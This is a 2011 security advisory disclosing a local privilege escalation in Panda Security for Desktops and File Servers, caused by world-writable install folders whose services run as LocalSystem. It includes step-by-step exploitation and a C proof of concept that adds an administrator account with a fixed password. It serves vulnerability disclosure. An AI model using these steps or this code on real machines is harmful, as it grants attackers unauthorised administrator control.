______________________________________________________________________ -------------------------- NSOADV-2011-002 --------------------------- Panda Security Local Privilege Escalation ______________________________________________________________________ ______________________________________________________________________ 111101111 11111 00110 00110001111 111111 01 01 1 11111011111111 11111 0 11 01 0 11 1 1 111011001 11111111101 1 11 0110111 1 1111101111 1001 0 1 10 11 0 10 11 1111111 1 111 111001 111111111 0 10 1111 0 11 11 111111111 1 1101 10 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011 0111111110 0110 1110 1 0 11101111111111111011 11100 00 01111 0 10 1110 1 011111 1 111111111111111111111101 01 01110 0 10 111110 110 0 11101111111111111111101111101 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111 111110110 10 0111110 1 0 0 1111111111111111111111111 110 111 11111 1 1 111 1 10011 101111111111011111111 0 1100 111 10 110 101011110010 11111111111111111111111 11 0011100 11 10 001100 0001 111111111111111111 10 11 11110 11110 00100 00001 10 1 1111 101010001 11111111 11101 0 1011 10000 00100 11100 00001101 0 0110 111011011 0110 10001 101 11110 1011 1 10 101 000001 01 00 1010 1 11001 1 1 101 10 110101011 0 101 11110 110000011 111 ______________________________________________________________________ ______________________________________________________________________ Title: Panda Security Local Privilege Escalation Severity: Medium Advisory ID: NSOADV-2011-002 Found Date: 13.01.2011 Date Reported: 20.01.2011 Release Date: 09.03.2011 Author: Nikolas Sotiriu (lofi) Mail: nso-research at sotiriu.de URL: http://sotiriu.de/adv/NSOADV-2011-002.txt Vendor: Panda Security (http://www.pandasecurity.com/) Affected Products: -Panda Security for Desktops 4.07.10 -Panda Security for File Servers 8.07.10 Remote Exploitable: No Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: =========== Panda Security for is the security solution for companies that need to protect their networks, mainly workstations and file servers. Panda Security for Business is centrally managed thanks to the AdminSecure Console, which allows monitoring the entire network, protecting your critical assets against all types of threats and optimizing productivity. (Product description from Panda Website) This vulnerability is similar to the following vulnerabilities in Panda products, which where discovered earlier: Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891 Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186 Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615 Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897 Jan 09 2010 NSO: http://sotiriu.de/adv/NSOADV-2010-001.txt More interesting is, that Panda failed since 2006 each year by releasing the new version with the same old bug. Description: ============ 1. Panda Security for Desktops +----------------------------- During installation of Panda Security for Desktops the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRVX86.EXE) are started from this folder. Services are started under LocalSystem account. Panda Security for Desktops doesn't installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the Firewall is installed TruePrevent is installed to. This can be exploited by: a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder b. Copy any application to PavSrvX86.exe c. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +------------------------------ %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrvX86.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PskSvc.exe 2. Panda Security for File Servers +--------------------------------- During installation of Panda Security for File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVNT\ by default are set to Everyone:Full Control. Few services (e.g. PavSrvx86.EXE) are started from this folder. Services are started under LocalSystem account. The Panda Security for File Servers installs the TruePrevent package by default, but it doesn't protect the files in the installation direcotry from manipulation. This can be exploited by: a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder b. Copy any application to PavSrvX86.exe c. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +------------------------------ %ProgramFiles%\PANDA SOFTWARE\AVNT\PavSrvX86.exe %ProgramFiles%\PANDA SOFTWARE\AVNT\PavFnSvr.exe %ProgramFiles%\PANDA SOFTWARE\AVNT\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVNT\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVNT\PskSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVNT\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVNT\TPSrv.exe Proof of Concept : ================== #include #include INT main( VOID ) { CHAR szWinDir[ _MAX_PATH ]; CHAR szCmdLine[ _MAX_PATH ]; GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH ); printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir ); system( szCmdLine ); printf( "Adding user \"owner\" to the local Administrators group...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir ); system( szCmdLine ); return 0; } Solution: ========= http://www.pandasecurity.com/enterprise/support/card?id=40061&idIdioma=2 Disclosure Timeline (YYYY/MM/DD): ================================= 2011.01.13: Vulnerability found 2011.01.20: Reported to Vendor 2011.03.08: Release of Advisory